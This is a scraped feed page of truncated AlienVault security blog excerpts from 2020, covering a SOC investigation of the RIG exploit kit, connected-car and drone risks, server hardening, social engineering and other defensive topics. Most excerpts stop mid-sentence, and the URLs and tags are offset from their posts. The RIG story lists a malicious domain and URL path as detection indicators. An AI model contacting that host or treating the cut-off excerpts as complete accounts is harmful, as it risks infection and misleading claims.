https://feeds.feedblitz.com/~/620586656/0/alienvault-blogs~Reasons-to-hire-an-InfoSec-candidate-without-experience-Focus-on-skillset-vs-experience www.secnews.physaphae.fr/article.php?IdArticle=1630088 False Studies None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC whitepaper that was released December 2, 2019. BroadAnalysis provided a step-by-step explanation of this exploit’s lifecycle, including all indicators of compromise (IOCs). Using the pulses created in OTX and threat intelligence from Alien Labs, AT&T’s Security Operations Center (SOC) was able to identify the initial behaviors of this threat and work in concert with the customer’s staff to mitigate the ongoing activity. Investigation Initial alarm review Indicators of Compromise (IOCs) The initial alarm surfaced as the result of a Domain Name System (DNS) request to the OTX IOC usa.lucretius-ada[.]com, an IOC associated with the first stage of the cyber kill chain. Upon further review, we realized this alarm triggered on the basis of a DNS request. After preliminary analysis, we determined the traffic did not directly correlate to an infection occurring on the endpoint, so we made the conscious decision to expand the Investigation. Expanded investigation Events search Given the fact that we had a positive hit on the domain as an IOC, we then conducted a query for all events that matched this domain. Subsequently, we discovered twelve firewall events egressing to this domain from varying points of origin, other than the initial source found in the alarm. After aggregating the related events, we determined there were six unique sources that had established connections to this domain. Reviewing these source devices, two appeared to be cell phones based on their hostnames, and the other devices appeared to be either user endpoints or possibly servers. These assets are not registered assets in USM Anywhere; thus, we were unable to derive additional information. Given the limited knowledge of the unregistered assets, at this point we had to rely on interfacing with the customer to verify if these devices were vulnerable and how best to plan our avenue for thwarting this threat. Event deep dive Now that we observed successful network traffic to the malicious domain, we turned back to the white paper from BroadAnalysis. The indicator we are matching is a specific URL on this domain. Reviewing the white paper, the indicator is: usa.lucretius-ada.com GET /zcvisitor/ We observed this URL in every firewall log from these six sources. At this time, we can confidently say that there are six devices who have successfully reached out to the malicious URL and that they are likely infected with this rig exploit. Reviewing for additional indicators After discovering these infected endpoints, we began building our notes for the Investigation. Simultaneously we reviewed the BroadAnalysis white paper to look for additional steps of the cyber kill chain being executed by these devices. Thankfully we were unable to discover any additional indicators and it appeared that we were still in the first stages of the exploit. Response Building the investigation Given the urgency of the situation, we created a high severity Investigation for the customer. Utilizing the capabilities of USM Anywhere, we generated a CSV report with the full event activity we were able to observe so they could have visibility on the events and situation. After attaching our report, we developed our notes to ]]> 2020-03-30T12:00:00+00:00 https://feeds.feedblitz.com/~/620538770/0/alienvault-blogs~Stories-from-the-SOC-RIG-Exploit-Kit www.secnews.physaphae.fr/article.php?IdArticle=1627964 False Ransomware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Connected cars have slowly become mainstream, with more than 700 million of them expected to be operating on roads by 2030. Most new vehicles are leaving production lines with a host of features that require a connection to the online world, including GPS, lane assistance, collision avoidance, and modern infotainment systems. However, while connected vehicles offer abundant opportunities for the consumer, automakers need to seriously consider what they mean for consumer privacy and security. Any software vulnerabilities could undermine the safety of connected car systems and features, putting the user's sensitive information at risk as well as their physical safety. As such, automakers need to adopt a cybersecurity culture that not only addresses the obvious exposures in their vehicle's software, but other hidden vulnerabilities that could arise from third-party components in their vehicles.  The current state of cybersecurity in connected vehicles  Cybersecurity is still an unstandardized anomaly in the automotive industry. According to a report by the Ponemon Institute, software security is moving at a much slower pace than technology in the industry, with only 10 percent of automakers having an established cybersecurity team. The economies of cybersecurity in cars are inherently unfair; with the right tools, attacks are affordable, low-effort affairs. On the other hand, mounting a coherent defense against such attacks requires higher effort and investment. So far, the playing field is in favor of the attackers, and there have been a few incidents that have put this into perspective. For example, security researchers demonstrated that a Jeep Cherokee could be hacked when they took control of the wipers, air conditioning, brakes, and accelerator from 10 miles away. Some Tesla vehicles also had a vulnerability that could potentially allow hackers to start the vehicle or cut the motor remotely.  The role of automakers in improving cybersecurity  Automakers must start viewing security testing as an investment that will result in better quality vehicles, not as an expense with no direct payback. Since technical vulnerabilities can arise at any time, automotive players need to consider cybersecurity throughout the product life cycle, starting from the design stage. ]]> 2020-03-25T12:00:00+00:00 https://feeds.feedblitz.com/~/620309768/0/alienvault-blogs~The-future-of-cybersecurity-for-connected-cars www.secnews.physaphae.fr/article.php?IdArticle=1619146 False Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC We’re all working together to help slow the spread of COVID-19 through new policies and guidelines such as working remotely and socially distancing ourselves from others.  Working remotely can be challenging. I can offer some advice about working remotely, as I have worked both remotely and in a travel capacity for over 10 years, and I really love working that way. Here are a few things I regularly do to ensure success while still managing a work-life balance. Working from home can make it difficult to maintain a work-life balance because, well, you’re at home. So, you have to prepare your work daily and complete what you have prepared for yourself. I plan every day, at the end of the day for how to the start the next morning. (I usually do it at night because I like to put in a few hours in the evening after I’ve spent some time with the family) Document everything you do. I document what I do through a series of notes in OneNote and with my Outlook calendar and tasks. If you do something ad-hoc throughout the day, allocate time on your calendar to account for it. Make time to call some of your co-workers every day, not just for business, but for "chatting and having a few laughs" as well. You would do it in the office, why not do it from home too? It helps to keep your sanity and keeps those relationships active and current. Take breaks, get a stand-up desk, sprinkle in little things to do for yourself. Do a home chore if you need to. Make your working environment yours. Working on the coffee table is a no-no. It's not a good work environment and it doesn't do anything for productivity. Don’t be afraid to break up your workday. Do your most productive customer facing activities during regular working hours and do your work that requires a higher level of concentration after-hours at your leisure, sometimes you will find that it's much easier than switching back and forth between phone calls and computer work. Take good notes, set aside time to think, study and grow your knowledge. This is important to stay on top of your industry. On a slow day, don't be afraid to walk outside to break up the scenery so that your work area doesn't become stagnant.  Take working from home as an opportunity to be there for your co-workers and family.  We’re all working together to do our part in keeping each other safe. Please take care of yourself. Thanks for taking a minute to read my post and I hope it helps make you more successful during your time spent working from home.      ]]> 2020-03-24T12:00:00+00:00 https://feeds.feedblitz.com/~/620262830/0/alienvault-blogs~tips-for-working-remotely www.secnews.physaphae.fr/article.php?IdArticle=1617346 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Windows 2019 Server Core.  Server Core removes the traditional GUI interface to the operating system and provides the following security benefits. • Server Core has a smaller attack surface than Server with a GUI • Requires fewer software updates and reboots • Can be managed using new Windows Admin Center • Improved Application Compatibility features in Windows Server 2019 Traditional Windows administrators may be apprehensive running Server Core due to a lack of PowerShell familiarity.  The new Windows Admin Center provides a free, locally deployed, browser-based app for managing servers, clusters, hyper-converged infrastructure, and Windows 10 PC’s. Windows Admin Center comes at no additional cost beyond Windows and is ready to use in production. You can install Windows Admin Center on Windows Server 2019 as well as Windows 10 and earlier versions of Windows and Windows Server and use it to manage servers and clusters running Windows Server 2008 R2 and later. Secure the Local Administrator Account Local Administrator Password Solution (LAPS) If Windows Server does get compromised, the attacker will quickly try to move laterally across your network to find highly valuable systems and information.  Credenti]]> 2020-03-23T12:00:00+00:00 https://feeds.feedblitz.com/~/620216544/0/alienvault-blogs~Windows-Server-OS-hardening www.secnews.physaphae.fr/article.php?IdArticle=1615615 False Ransomware,Malware,Tool,Vulnerability,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Department of Homeland Security’s Security Lexicon, Adaptive Threats are defined as: “…threats intentionally caused by humans.” It further states that Adaptive Threats are: “…caused by people that can change their behavior or characteristics in reaction to prevention, protection, response, and recovery measures taken.” The concept of threat adaptation is directly linked to the defense cycle.  In short, as defenses improve, threat actors change their tactics and techniques to adapt to the changing controls.  As the threat actor improves their capabilities the defensive actors necessarily have to change their own protections.  This cycle continues ad infinitum until there is a disruption. The US Department of Homeland Security (DHS) lexicon defines a vulnerability as…”…characteristic of design, location, security posture, operation, or any combination thereof, that renders an asset, system, network, or entity susceptible to disruption, destruction, or exploitation”  Expanding upon this it can be described as a susceptibility which would allow a single (or combination of) technique(s), tactic(s), or technology(ies) (exploits) to circumvent, bypass, or defeat the protection offered by the technique, tactic, or technology in place as protection (the control) against a(an) anticipated exploit(s).  Succinctly, a vulnerability is a susceptibility to a given, identified exploit. While a given vulnerability in a system may not have been yet been identified, they may exist.   Given enough time, effort, and the right tools, any security control can be circumvented.  As stated previously, security can be expressed as a function of time and resources (S=f(TR)).  It is also important to note that the concepts of exploits and vulnerabilities are inextricably entwined and mutually dependent. The common security noun “exploit” is adapted from the English verb “to exploit” which means to “use something to one’s advantage. It has been turned into a noun. An exploit is defined as something that…”]]> 2020-03-17T12:00:00+00:00 https://feeds.feedblitz.com/~/619952024/0/alienvault-blogs~Exploits-vulnerabilities-and-threat-adaptation www.secnews.physaphae.fr/article.php?IdArticle=1602635 False Vulnerability,Threat None 5.0000000000000000 AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Angela Duckworth's GRIT, where she explains that the secret to outstanding achievement is not talent but a unique blend of passion and persistence she calls "grit," I was able to relate the need for this power of passion and perseverance to be a successful cybersecurity professional and more importantly a trusted cybersecurity consultant. It takes a combination of skills, education, and years of work experience. With the right leadership and the right organization, your security career is on the onward and upward from that point. Here are some things that I have learned along the way and want to share. Understanding of cybersecurity beyond technology and compliance As a cybersecurity consultant, you act as a trusted advisor, and this provides you the opportunity to work with customers to accelerate business security goals. You offer security recommendations that are designed to fit overall business objectives while providing compliance with the organization's regulations and policies. It is vital to hone in on practical communication skills. Effective communication is required to deal with security teams. You have to have regular effective communication with executives, department heads, and sometimes even the end-user. Without strong communication skills, it's nearly impossible to be a successful cybersecurity consultant. Beyond cyber speak, a cybersecurity consultant must be able to understand and explain the risks to the business operations when a security control fails. Ability to thrive under pressure Through all the years of delivering as a cyber consultant, one of the key attributes that I found to be common across all successful consultants is the ability to thrive in times of disruption. The consultant should have a passion for turning challenges and opportunities into long-term competitive advantages.   An ability to prioritize your workload, work well under pressure, and concurrently manage customers' expectations is a vital part of being a good cybersecurity consultant.  We often hear of folks wanting to be a cyber consultant ask about which tools to learn, which technologies to focus on etc. While all those are valid and relevant, having a practical business awareness and an understanding of the cybersecurity challenges faced by organizations is vital to be able to apply the right level of security controls. Team Player and Problem Solver As a cybersecurity consultant, you'll work as part of a team of problem solvers, helping to solve complex business issues from strategy to execution. It is necessary to understand how the consulting business operates and adds value to clients.  One of the required critical attributes for a cyber consultant is to think broadly and ask questions about data, facts, and other information. You should be able to embrace diverse perspectives and welcome opposing and conflicting ideas. Knowledge and skill builder Develop your knowledge around national/international security standards, including NIST, PCI, CJIS, CMS, ISO, SOX, HIPAA, HITECH, and other regulatory requirements.  Gain knowledge of network design, security protocols, and cloud integration security, with excellent analytical and problem-solving skills. Understanding the life cycle of network threats, attacks, attack vectors, and methods of exploitation with an understanding of intrusion set tactics, techniques, and procedures. In-depth knowledge of architecture, engineering, and operations of at least one enterprise SIEM platform. Advanced understanding of TCP/IP, standard networking ports and protocols, traffic flow, system administration, OSI model, defense-in-depth, and common security elements. Understanding of malware analysis concepts and methods. Familiarity with the Cyber Kill Chain methodology. Knowledge of v]]> 2020-03-16T12:00:00+00:00 https://feeds.feedblitz.com/~/619898016/0/alienvault-blogs~Do-you-have-the-GRIT-to-be-a-cybersecurity-consultant www.secnews.physaphae.fr/article.php?IdArticle=1600018 False Malware,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Data is the hottest commodity in town, particularly on the dark web. But there’s one type of file that hackers are most interested in: your medical data. Whereas a credit card number or Social Security number can net a criminal $1-$15 depending on the data type, medical records can sell for the equivalent of $60 each (in Bitcoin). What’s more, the theft of these files isn’t uncommon. Despite U.S. healthcare organizations’ mandatory compliance with the Health Insurance Portability and Accountability Act (HIPAA) Security Rule, healthcare topped the charts for the number of data breaches in 2018. And hackers don’t need to break in to get the data: over half the incidents reported were the product of internal threats, either errors or bad actors. As the medical community becomes more and more reliant on internet-connected technology and generates record amounts of personal data, they’re going to need to learn how to scale their cybersecurity efforts to the same extent. Patients’ privacy and even their lives depend on it. The Medical Community Needs to Get Better at Security Stories of hacked machines, demands for payment, and blackmail are appearing in the media with greater frequency than ever. That’s no surprise: ransomware attacks are a growing threat for healthcare organizations. Why? Because in a life or death situation, a hospital needs to decide whether to pay the hacker or lose the patient. The medical community is increasingly facing threats at a greater rate than many other industries. Unfortunately, their security training practices don’t match the growing occurrence nor the obligation healthcare providers have under the law: a study by Kaspersky Lab in 2019 noted that only 29% of respondents knew and understood the HIPAA Security Rule, a fundamental part of their job. What’s more, 40% of workers weren’t aware of their organization’s cybersecurity rules and measures. It’s easy to believe that nurses, doctors, and administrative staff don’t need comprehensive cybersecurity training. It should be the IT department’s role. Unfortunately, cybersecurity doesn’t work that way: hackers aren’t scaling walls to get into healthcare systems, they look for open doors first. And when a doctor or nurse doesn’t know how to encrypt their email, uses weak passwords, or clicks on an email infected with malware, then the hacker can walk right in. Hackers Get in Through the Most Unlikely Doors The problem goes beyond what happens within the confines of a doctor’s office or hospital setting. As healthcare organizations connect with patients through their personal devices, they’ll have to secure not only their own devices and programs but also compensate for side doors created through other unsecured apps and platforms. In 2020, researchers reported that hackers were using the Google Play platform to distribute apps that screenshot sensitive user information. To do so, the]]> 2020-03-12T12:00:00+00:00 https://feeds.feedblitz.com/~/619728124/0/alienvault-blogs~Malicious-Actors-and-Medical-Data-Where-Are-We-Heading www.secnews.physaphae.fr/article.php?IdArticle=1593454 False Ransomware,Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The Federal Aviation Administration (FAA) reports that there are nearly 1.5 million registered drones in the United States, proving them to be ubiquitous across the country - and there are plenty that are still unregistered, too. From military use to consumers who buy them to start a new hobby, drones are now used in many aspects of today’s society. Even Amazon plans on making drones part of their shipping process at some point in the future. However, the rising risks of cyber-attacks that involve drones prove they may be a threat to many. How it’s possible While it may seem impossible for a drone to affect cybersecurity, there are several factors that make it entirely possible for drones to carry out many malicious cybercrimes. For instance, drones equipped with cameras have been associated with spying. In fact, there have been many arrests for drone spying — and that’s not all a drone can do. In addition to taking bird’s-eye pictures and video, drones can also be used to spy on networks, capture data and block communications, making them a huge threat to cybersecurity as a whole. The fact that drones carry this type of threat to cybersecurity is due to their vast capabilities. In addition to cameras, many drones come equipped with GPS, USB ports, and other means that can easily allow them to be hijacked. Hackers can use tools to easily tap into drones if the owner doesn’t install certain security measures. This leaves many commercial drones at risk of exploitation due to the fact that they communicate with their operators via WiFi and GPS, which often tend to be unencrypted.  An increasing risk to cybersecurity With all that a drone can do, it comes as no surprise that they pose such a risk to cybersecurity. In addition to the privacy issue and the fact that drones are vulnerable to hackers, previous incidents prove how risky the small aircrafts can be. For instance, drones have created new risks for the security of the travel industry. It's important that drones are powered off for safety reasons during travel, and as such, there are regulations in place for traveling with them. This reduces the risks posed in airports. For example, in December of 2018, Gatwick Airport in England experienced a drone incident where drones were reported in the airspace. This came as a threat to both the airport's aircrafts and travelers, which created delays, cancellations, and the disruption of travel plans for many. Even more recently, the FAA had to temporarily restrict airspace above the crash site of the helicopter crash that involved former professional basketball player Kobe Bryant, due to the number of drones and other aircraft that swarmed the area following the incident. Security measures such as geofencing software attempt to restrict drones being flown near airports and other restricted areas, and radar detection is also helpful in locating nearby threats. However, in the future, the evolution of drone technology means that they may come equipped with even more advanced features, which can potentia]]> 2020-03-09T12:00:00+00:00 https://feeds.feedblitz.com/~/619596266/0/alienvault-blogs~The-rising-threat-of-drones-to-cybersecurity-What-you-need-to-know www.secnews.physaphae.fr/article.php?IdArticle=1589546 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Fake apps are apps that mimic the original or legitimate app. It copies the look and function of the app to attract users to download it. Once a user downloads the fake app, multiple things can happen to the user's device. Sometimes it contains malicious content, making the mobile device acts strangely. Some fake apps aggressively display ads on a device, while other apps steal information from users. There are thousands of fake apps present in different app stores. In McAfee's 2019 Mobile Threat Report, they have detected 65,000 fake apps. Even Apple's app store, which is known to be the safest, has detected 17 apps to be infected with malware last year. All of the apps that contain malware in Apple's store originated from one developer. The problem is that many people cannot distinguish a fake app from a real one. That's why many fall victim to this attack. If you have been a victim or if you want to be sure not to download a fake app, you must know its characteristics. Fake apps do look similar to real apps, but they have some key points that make them different. Here are the ways you can spot a fake app on an app store. CHECK THE NAME Before downloading an app, make sure to check on the name of it. See if there misspelled words, or the logo looks different from the real app. Popular apps often have a fake alternative, that's why when you look for that app, you are given a lot of choices that look almost all the same. But you can check the name of it to know if it's real or not. CHECK THE DEVELOPER’S NAME If you want to download an app for your mobile device, you have to research the app. Get to know who the developer/s is/are and what company the app comes from. If you have an idea about the app's background, you can more easily spot if an app is not real. To be certain, you can search for other apps the developer has built. You can click on the developer's name, and see other of the apps they have designed. CHECK THE REVIEWS Reviews can tell you what other users have experienced with the app. Be cautious if you have noticed negative comments or people complaining about experiencing problems with their devices since downloading the app. It could indicate that the app might contain malware. CHECK ON THE DATE If an app is recently published, you'll be able to see this. A recently published app that is in demand can indicate that the app is fake. Most popular apps have been on the market for a while. That's why the published date should have the words "updated on" instead of a specific date. BEWARE OF DISCOUNTS Some apps offer discounts that are too good to be true. If you see apps promising you excellent features with a small price, this is an indicator that the app is counterfeit. It is a technique fake developers do to persuade people into downloading their apps. LOOK AT THE SCREENSHOTS If everything seems to look good, you can t]]> 2020-03-05T13:00:00+00:00 https://feeds.feedblitz.com/~/619452340/0/alienvault-blogs~How-to-spot-a-fake-app www.secnews.physaphae.fr/article.php?IdArticle=1582867 False Malware,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC CloudWays server. Does this mean you can take advantage of their migrator plugin that smooths over the transition process because their engineers take care of everything for you. The result is a clean website that’s moved from one place to another, and is bug-free. Another smart idea is to register your domains with NameCheap. Whenever it’s time to move your host, your domains won’t need to change because NameCheap helps you transfer a domain from one host to another. All you have to do is register your domain with NameCheap and then use the ‘Change Ownership’ option when it’s time to move host whilst keeping the same domain. It’s the same with email. If you choose the right host, you won’t need to worry about silly things like downtime or making changes to settings. Your emails will stay the same. You’ll feel more secure Online systems are not foolproof and cybersecurity continues to be a big issue in 2020. Every single online system is susceptible to attack. Isn’t that a little scary when your domain, email, and website are all with the same provider? Literally, everything you’ve worked hard on could be destroyed because all a hacker has to do is decode one login. Moreover, data loss doesn’t just affect you - it affects your clients, and their confidence and trust in you goes down. The stats show that 67% of all data loss is caused by system failures, while hackers are often also behind data loss. And no one is safe from an attack. Just last year in 2019, Microsoft Office 365 accounts were attacked by hackers. On the other hand, if your email, website and domain are all on separate providers, hackers need to figure out 3-4 logins. That is highly unlikely. Genesis web developer Andrea Whitmer has separated her email, domain and website and points out how much time it takes to recover everything if just one attack wipes you clean out. “A few years ago, my dad’s website got hacked. Not only]]> 2020-03-04T13:00:00+00:00 https://feeds.feedblitz.com/~/619410974/0/alienvault-blogs~Dis-Advantages-of-having-your-domain-email-and-website-on-separate-providers www.secnews.physaphae.fr/article.php?IdArticle=1580691 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC the cloud, the internet-of-things, and countless network devices help a business save money and time while making operations more efficient. Companies are now capable of taking brainstorming discussions about new apps, and make them into prototypes in a day - but while this new efficiency is yielding incredible results, correct security must be implemented to keep these businesses prospering in the long term. Successful small businesses of any kind share a common trait between them: they move and grow rapidly. Broken down this means they’re bringing on new contractors and employees, experimenting with new technologies and ideas, expanding to new locations, and doing this all in a matter of days. Image Source - https://unsplash.com/photos/JJPqavJBy_k Experts in cutting edge technologies like app development, AI, machine learning are all brought on to modernize the business, while new sales and marketing experts are sourced to give the company its competitive edge. Throughout this growth, new employees and contractors are given access to the companies cloud to get involved with the work, but in doing so, the security vulnerabilities begin. Small businesses don’t have to make sacrifices for security The speed that successful startups and small businesses experience can be addictive, but with this comes the belief that putting more work into security will cause them to slow down. The American economy is growing, with the latest US Federal Reserve Board’s SCF survey finding that GDP has grown at an average rate of 2.2% since 2013.  As a result of this growth, small businesses are financially better off than they were before, but their sensitive information will find themselves in hacker's crosshairs more and more frequently. Luckily, with Zero Trust, businesses don’t have to sacrifice much of their speed to get their security in shape. By following the correct Zero Trust approach, businesses can secure their systems, time, and intellectual property by reducing their risk of falling prey to a massive data breach. Here are the key security steps businesses can implement into their Zero Trust approach to ensure that costly, time sink data breaches aren’t stealing their data and hurting their momentum and reputation: 1) Track, monitor and audit all privileged account access in real-time, including metadata, to ensure you have a full picture of each user's intentions and actions within accounts. You need to know who is using your company’s network. Having a full chronology of the user's actions within accounts is invaluable when it comes to cybersecurity. It gives you a much stronger chance of preventing malicious use as it happens and also helps you to discover how these incidents hap]]> 2020-03-02T13:00:00+00:00 https://feeds.feedblitz.com/~/619328894/0/alienvault-blogs~How-a-small-business-can-achieve-Zero-Trust-security www.secnews.physaphae.fr/article.php?IdArticle=1576624 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Data Security Standard – an internationally accepted standard for secure card payments with 12 security requirements. PCI Security Standards Council was established in 2006 for regulating payment brands and helping merchants secure financial data of customers. Regardless of the size of your business, compliance to the standard is important to ensure that you meet fundamental security requirements to process customer transactions. PCI SSC also provides online safety education to merchants and assists them in taking important steps to improve their website’s safety. They analyze your transaction system, find and fix vulnerabilities. Their compliance team then creates a report and shares it with all banks and card brands associated with your business. Compliance with PCI DSS means that your company has implemented and the requirements for card payment security. Ensure data encryption The second step towards enhancing online payment security is to use data encryption to keep customer’s financial information private. Nowadays with open WIFI networks, identity theft is prevalent and relatively an easy task for hackers if the data is unencrypted. Websites that your business deals with for online transactions should be valid and with legitimate operators. Data encryption ensures that your sensitive information is only viewed by the authorized parties and does not fall into wrong hands. It also reduces password-hacking likelihood to a great extent. All these features combined proved an additional protection layer for customers during the transaction. Keep your network updated Hackers regularly come up with new ways to hack into systems, and while your network may be safe from them today, it may not be tomorrow. For this reason, it is really important that your business’s computer networks have security updates regularly installed on them. The best way is to sign up for automatic system updates to stay a step ahead from new threats. Automatic update will ensure that all important safeguards are installed, the absence of w]]> 2020-02-27T13:00:00+00:00 https://feeds.feedblitz.com/~/619133740/0/alienvault-blogs~Online-payment-security-Steps-to-ensure-safe-transactions www.secnews.physaphae.fr/article.php?IdArticle=1568638 False Hack,Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Leading Cyber Ladies meetup in Toronto recently, where threat research expert Sherrod DeGrippo visited all the way from Atlanta to talk about how cyber threats often work these days, and what their attack chains are like. I had the idea to write about social engineering before I attended the meeting, but I wasn’t expecting to do research for this post by attending it. It was just a very fortunate coincidence that DeGrippo said some things about social engineering that really captured my attention. After the meeting, we had a quick chat and followed each other on Twitter. During her talk at the meeting, DeGrippo mentioned how she sees a lot of cyber attackers, from APTs to script kiddies, target human beings as an initial attack vector a lot more often than they used to. She said doing reconnaissance for a corporate network is very difficult, whereas doing reconnaissance on a person is a lot easier. We post about ourselves on social media all the time. We talk about the places we’ve visited and the things we like on Twitter. We talk about who our family and friends are on Facebook. And we tell LinkedIn our job titles, who we work for, and what we do there. An individual who works for a targeted company has privileged access to their networks and to their physical buildings. Socially engineer them, and you can get malware on their systems to send sensitive data to a command and control server, or you could possibly walk into an employees-only area of an office. The other thing she discussed which intrigued me is that she sees information security professionals targeted for social engineering attacks more often than ever before, and how we can be really lucrative for social engineering exploitation. Contrary to us thinking that we know better, it often works! I asked DeGrippo about it. She said: "Yes, targeting infosec professionals is my big concern lately. The more sophisticated actors are doing really specific targeting. This includes people in security roles and lots of people in software development roles. There is so much info out there. A job offer, a security report, a discussion of a new technology and a code snippet-- all potential social engineering lures to send to technical people with privileged access.” I said, “Maybe some of us are way too confident. That confidence can be dangerous.” "… totally. I worry about that. I worry that as an industry we are so focused on protecting others that we let our own opsec (operational security) slip or we just don’t have time to focus on it as much. It’s not really hubris in most cases, it’s just forgetting to do a threat model on ourselves.” She also spoke to me about how cyber attackers often choose their social engineering targets. “The thing I like to do is get into the psychology of a threat actor. If I could be anyone I wanted to be, but only online, who would I choose? A software dev at a fancy car company? I could hack some luxury car software to unlock for me anytime, anywhere!  A junior HR admin at a large company? Steal a ton of identity and payroll data! Maybe I would be a fancy CFO’s assistant and make changes to deposit instructions for invoices to my own mule account ]]> 2020-02-25T13:00:00+00:00 https://feeds.feedblitz.com/~/619020986/0/alienvault-blogs~How-to-harden-your-employees-from-the-massive-social-engineering-threat www.secnews.physaphae.fr/article.php?IdArticle=1564782 False Malware,Hack,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC What is in a name? Moving beyond acronyms: As you are putting together the building blocks of IRM and moving beyond GRC, some of the key considerations should be around the outcomes of the IRM initiative. Is this going to help build a risk-aware culture within your organization? A cyber strategy is closely linked to business strategy and risk-aware culture gets your cybersecurity initiatives a step closer to the business objective. That brings about the need for a formalized risk strategy within your organization. It is not about listing out of all the potential risks but being able to tie it to business outcomes and more importantly, to see it through to risk mitigation. Today, we see many point solutions within organizations and the data generated from many sources never make it to the overall risk posture and do not feed into the actionable decision-making process. With increased attention being paid to risk management as a critical driver for business success, more companies are thinking about the potential of an integrated risk management approach, and we hope this triggers an initial action plan that can be applied in that process. ]]> 2020-02-24T13:00:00+00:00 https://feeds.feedblitz.com/~/618966580/0/alienvault-blogs~Dawn-of-a-new-decade-Leaping-from-GRC-to-IRM-A-building-block-approach www.secnews.physaphae.fr/article.php?IdArticle=1563287 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 2018 (ISC)² Cybersecurity Workforce Study, more than 2.9 million cybersecurity related job positions worldwide were unfilled. In the time that’s passed, that number likely grew. These are positions spanning a wide range of roles, from SOC analysts to DFIR, from penetration testers to application security specialists. Not having people work in these positions that organizations have recognized as needs inevitably weakens cybersecurity everywhere, and companies lose huge amounts of money in cyber attacks and data breaches. I have my own personal views on the matter. But cybersecurity people on Twitter also talk a lot about unrealistic job posting expectations and their impact on the skills gap. Shawn Thomas is a SOC manager. He tweeted about his exasperation with job posting requirements. “If your entry level job in infosec requires: A masters At least 3 certs Prefers two years of experience. YOU ARE NOT ALLOWED TO COMPLAIN THAT ITS HARD TO FIND CANDIDATES Additionally the discouragement students have when they hear that should make you feel bad about yourselves.” I also have an industry friend who has done a lot of her own research into the skills gap matter. Plus she has experience hiring for cybersecurity roles, experience that I lack. Alyssa Miller is a security evangelist and hacker, and she shares her knowledge at so many security conferences that it’d overwhelm me to do the same. She has written many posts on her blog about the skills gap, so I wanted to learn a bit from he]]> 2020-02-20T13:00:00+00:00 https://feeds.feedblitz.com/~/618797078/0/alienvault-blogs~Is-the-cybersecurity-skills-gap-real www.secnews.physaphae.fr/article.php?IdArticle=1554316 False Threat None None